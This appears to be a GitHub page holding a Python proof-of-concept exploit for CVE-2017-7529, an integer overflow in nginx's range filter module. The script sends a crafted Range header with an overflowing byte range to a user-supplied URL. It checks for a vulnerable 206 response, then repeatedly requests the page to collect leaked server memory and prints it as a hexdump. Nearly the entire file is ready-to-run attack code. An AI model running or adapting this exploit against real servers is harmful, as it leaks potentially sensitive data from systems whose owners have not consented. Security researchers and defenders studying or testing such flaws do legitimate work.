forked from en0f/CVE-2017-7529_PoC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2017-7529_PoC.py
79 lines (72 loc) · 3.67 KB
/
CVE-2017-7529_PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
import urllib.parse, requests, argparse
global colorama, termcolor
try:
import colorama, termcolor
colorama.init(autoreset=True)
except Exception as e:
termcolor = colorama = None
colored = lambda text, color="", dark=False: termcolor.colored(text, color or "white", attrs=["dark"] if dark else []) if termcolor and colorama else text
class Exploit(requests.Session):
buffer = set()
def __init__(self, url):
length = int(requests.get(url).headers.get("Content-Length", 0)) + 623
super().__init__()
self.headers = {"Range": f"bytes=-{length},-9223372036854{776000 - length}"}
self.target = urllib.parse.urlsplit(url)
def check(self):
try:
response = self.get(self.target.geturl())
return response.status_code == 206 and "Content-Range" in response.text
except Exception as e:
return False
def hexdump(self, data):
for b in range(0, len(data), 16):
line = [char for char in data[b: b + 16]]
print(colored(" - {:04x}: {:48} {}".format(b, " ".join(f"{char:02x}" for char in line), "".join((chr(char) if 32 <= char <= 126 else ".") for char in line)), dark=True))
def execute(self):
vulnerable = self.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
if vulnerable:
data = b""
while len(self.buffer) < 0x80:
try:
response = self.get(self.target.geturl())
for line in response.content.split(b"\r\n"):
if line not in self.buffer:
data += line
self.buffer.add(line)
except Exception as e:
print()
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
break
except KeyboardInterrupt:
print()
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
break
print(colored(f"[i] Receiving Data [{len(data)} bytes] ..."), end = "\r")
if data:
print()
self.hexdump(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog = "CVE-2017-7529",
description = "Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
epilog = "By: en0f")
parser.add_argument("url", type = str, help = "Target URL.")
parser.add_argument("-c", "--check", action = "store_true", help = "Only check if Target is vulnerable.")
args = parser.parse_args()
try:
exploit = Exploit(args.url)
if args.check:
vulnerable = exploit.check()
print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
else:
try:
exploit.execute()
except Exception as e:
print(colored(f"[!] {type(e).__name__}:", "red"))
print(colored(f" - {e}", "red", True))
except KeyboardInterrupt:
print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
except Exception as e:
print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(e).__name__}", "red"))